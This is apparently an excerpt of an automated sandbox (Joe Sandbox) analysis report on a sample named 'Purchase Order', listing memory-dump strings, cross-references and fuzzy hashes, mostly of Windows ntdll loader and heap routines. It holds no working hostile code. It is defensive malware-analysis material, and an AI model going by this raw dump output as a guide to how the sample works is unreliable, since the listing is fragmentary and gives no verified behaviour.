                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            Strings
                                                            • HandleTraces, xrefs: 018E8C8F
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018E8A3D
                                                            • VerifierDebug, xrefs: 018E8CA5
                                                            • VerifierFlags, xrefs: 018E8C50
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018E8A67
                                                            • VerifierDlls, xrefs: 018E8CBD
                                                            • AVRF: -*- final list of providers -*- , xrefs: 018E8B8F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018B9A2A
                                                            • apphelp.dll, xrefs: 01856496
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018B9A11, 018B9A3A
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018B99ED
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 018B9A01
                                                            • LdrpInitShimEngine, xrefs: 018B99F4, 018B9A07, 018B9A30
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • LdrpInitializeImportRedirection, xrefs: 018D8177, 018D81EB
                                                            • LdrpInitializeProcess, xrefs: 0189C6C4
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0189C6C3
                                                            • Loading import redirection DLL: '%wZ', xrefs: 018D8170
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018D81E5
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018D8181, 018D81F5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            Strings
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018D219F
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018D21BF
                                                            • RtlGetAssemblyStorageRoot, xrefs: 018D2160, 018D219A, 018D21BA
                                                            • SXS: %s() passed the empty activation context, xrefs: 018D2165
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018D2180
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018D2178
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            APIs
                                                              • Part of subcall function 018A2DF0: LdrInitializeThunk.NTDLL ref: 018A2DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D60
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018A0D74
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            • API String ID: 1404860816-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            • API String ID: 0-379654539
                                                            Strings
                                                            • @, xrefs: 01898591
                                                            • LdrpInitializeProcess, xrefs: 01898422
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01898421
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0189855E
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1918872054
                                                            Strings
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018D22B6
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018D21D9, 018D22B1
                                                            • .Local, xrefs: 018928D8
                                                            • SXS: %s() passed the empty activation context, xrefs: 018D21DE
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            • API String ID: 0-1239276146
                                                            Strings
                                                            • RtlDeactivateActivationContext, xrefs: 018D3425, 018D3432, 018D3451
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018D342A
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018D3456
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018D3437
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                            • API String ID: 0-1245972979
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018C0FE5
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018C1028
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018C106B
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018C10AE
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                            • API String ID: 0-1468400865
                                                            Strings
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018CA992
                                                            • apphelp.dll, xrefs: 01882462
                                                            • LdrpDynamicShimModule, xrefs: 018CA998
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA9A2
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-176724104
                                                            Strings
                                                            • HEAP: , xrefs: 01873264
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0187327D
                                                            • HEAP[%wZ]: , xrefs: 01873255
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                            • API String ID: 0-617086771
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-4253913091
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@
                                                            • API String ID: 0-1077428164
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            • API String ID: 0-2779062949
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA121
                                                            • Failed to allocated memory for shimmed module list, xrefs: 018CA10F
                                                            • LdrpCheckModule, xrefs: 018CA117
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-161242083
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-1334570610
                                                            Strings
                                                            • Failed to reallocate the system dirs string !, xrefs: 018D82D7
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018D82E8
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018D82DE
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1783798831
                                                            Strings
                                                            • @, xrefs: 0191C1F1
                                                            • PreferredUILanguages, xrefs: 0191C212
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0191C1C5
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            Strings
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018E4888
                                                            • LdrpCheckRedirection, xrefs: 018E488F
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018E4899
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-3154609507
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-2558761708
                                                            Strings
                                                            • LdrpInitializationFailure, xrefs: 018E20FA
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018E2104
                                                            • Process initialization failed with status 0x%08lx, xrefs: 018E20F3
                                                            APIs
                                                            Strings
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            Strings
                                                            • LdrResSearchResource Enter, xrefs: 0186AA13
                                                            • LdrResSearchResource Exit, xrefs: 0186AA25
                                                            Strings
                                                            • String ID: `$`
                                                            Strings
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            Strings
                                                            • String ID: @$MUI
                                                            Strings
                                                            • kLsE, xrefs: 01860540
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0186063D
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0186A309
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0186A2FB
                                                            Strings
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            Strings
                                                            • String ID: MUI
                                                            Strings
                                                            • String ID: GlobalTags
                                                            Strings
                                                            • String ID: .mui
                                                            Strings
                                                            • String ID: EXT-
                                                            Strings
                                                            • String ID: BinaryHash
                                                            Strings
                                                            • String ID: #
                                                            Strings
                                                            • String ID: BinaryName
                                                            Strings
                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018E895E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33a9228f2dec0fde69c94fbd1a0356ccf525a103e58926d338952396bfab6cd1
                                                            • Instruction ID: 6d10492d8500648ab086384939a831c1f921ebf01d4517f28f0c5165ba673929
                                                            • Opcode Fuzzy Hash: 33a9228f2dec0fde69c94fbd1a0356ccf525a103e58926d338952396bfab6cd1
                                                            • Instruction Fuzzy Hash: A1226E70E0011ADBDB15DF99C4809BEFBF2BF85704B54816AE945EB241E734EE42DBA0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                                            • Instruction ID: 42860d01c8433d8e555979df2be77f91cbbe661f5d6ff4bed0ca820c235958ee
                                                            • Opcode Fuzzy Hash: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                                            • Instruction Fuzzy Hash: 6C32AF71A00645CFDB25CF68C480BAABBF6FF48304F248569E955EB352E734EA41CB90
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction ID: 8e3d0827bedad42304d9d96a7e7fe29d5b0361dc4b381552b64d112d1119ac7c
                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction Fuzzy Hash: 99F17E72E0061B9BDB15DFA9C580BAEBBF6AF48754F04812DE905EB341E734DA41CB60
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                                            • Instruction ID: 2ccab9a122ce256405793d6fd827089a78cf3cc38e298ad82594a606e1e85e6d
                                                            • Opcode Fuzzy Hash: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                                            • Instruction Fuzzy Hash: F9D1D071A0060A9FDF15CF69C841BBEB7F1AF89304F18816DDA55E7241E735EA06CB60
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                                            • Instruction ID: 9ab983120abb054cf1fa2ea388f0fc89443ae107373d1fcbac60b570d92996b0
                                                            • Opcode Fuzzy Hash: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                                            • Instruction Fuzzy Hash: 64E18071508382CFC715CF28C190A6ABBE5FF89318F158A6DE995C7351EB31EA05CB92
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                                            • Instruction ID: 471146effc5cde122c86df53803e923a7a5d256014f2bffe572bf12bec92fa60
                                                            • Opcode Fuzzy Hash: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                                            • Instruction Fuzzy Hash: A2D1E371A0020ADBDB54DF6AC8C0ABA77A5FF56308F04462EED16DB281E730EB55CB51
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction ID: 0ab5b37084b9a6bd523545f5bf1f1fd1bcd20344c2fbd5edaccf6411e31482ff
                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction Fuzzy Hash: CDB17274A00609AFDF24DF99C948AAFBBF9FF86304F14445DAA02D7791DA74EA05CB10
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction ID: 9d9e63b663a24cf059fa8bb1d174adf570495566168f04445a1af18c04817574
                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction Fuzzy Hash: 55B1063160464AAFDB25CBA8C850BBEBBF6AF85704F140159E656EB281D730EF81CB51
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                                            • Instruction ID: 69e76627564a7a2e84b96441477d55a3a477c139a343d27a6dc4936b5af5433c
                                                            • Opcode Fuzzy Hash: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                                            • Instruction Fuzzy Hash: 69C14974508341CFE764CF19C498BAAB7E9BF88704F44495DE989C7291E774EA08CF92
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                                            • Instruction ID: dc7e93df3f843a46506b67165ec176eff632e542ef495afd50e0ce0527ba31c0
                                                            • Opcode Fuzzy Hash: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                                            • Instruction Fuzzy Hash: BDB16370A002658BDB65DF58C890BA9B7F5FF44744F0485E9E90AEB241EB709E86CF21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                                            • Instruction ID: 6fd747d8c338990a2e1991f5864d155b6878427359124543aad990ead92f8c91
                                                            • Opcode Fuzzy Hash: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                                            • Instruction Fuzzy Hash: 05A1E731E006599FFB21EB5CC844BADBBA5AF01B18F054115EB11E7291D774DF40CB91
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                                            • Instruction ID: 75e06ba19e576326b14e58cc07be62e00b93aaf7600e5cae08ed2c73adbc0a6c
                                                            • Opcode Fuzzy Hash: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                                            • Instruction Fuzzy Hash: 9EA1C470B0171A9FEB25DF69D890BAAB7B1FF54318F444029FA45D7281EB34EA11CB50
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                                            • Instruction ID: 519eaed8ee607b3f2b4b69a33dd16171707734770a2fd27130bb1bf51c72f3a0
                                                            • Opcode Fuzzy Hash: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                                            • Instruction Fuzzy Hash: 24A1AE72A04612DFD722DF28C980F5ABBE9FF88745F460A28E549DB651D334ED01CB92
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                                            • Instruction ID: 3655b8f1db50a6a962edf5c21f28a1a66a17cdae5f441a2128c48458a2096417
                                                            • Opcode Fuzzy Hash: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                                            • Instruction Fuzzy Hash: 75917371D0021AAFDB15DF68D888BAEBFF5AF5A710F254159E610EB241E734DB009BA0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                                            • Instruction ID: 815ac2a7d3a80f0bb8c5e8eb6ac7c54f72f55b3588a46bfd4514eb22ffc8deb2
                                                            • Opcode Fuzzy Hash: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                                            • Instruction Fuzzy Hash: 7291F571E0061ACBEB24DB6DC484BBABBA1FF94B18F0541E9ED05EB241E634DB41C752
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                                            • Instruction ID: f910a5f3b054e68d7030591bba6711046c946d5b713280c1f9cf760c6b821e88
                                                            • Opcode Fuzzy Hash: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                                            • Instruction Fuzzy Hash: A9817271A0061A9BDB24CF69C990AFEBBF9FB48700F14852EE555E7740E334EA40CB94
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction ID: 583827d9ed3805788d315156ee3d52a0a108c231078c3f15a7514e430e210a1c
                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction Fuzzy Hash: 60818332A002169FDF19CF59C480AAEBBF6FF84311F188569D91A9B789D734EA05CB50
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                                            • Instruction ID: 8a7d05b436fc123cb73b3596f0dd41a1888ef47ca8a0ce2ed8d91b030555c7a6
                                                            • Opcode Fuzzy Hash: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                                            • Instruction Fuzzy Hash: ED814F71A00609AFDB25CFA9C880AEEBBBAFF88354F144429E555E7250D730AE45DB60
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
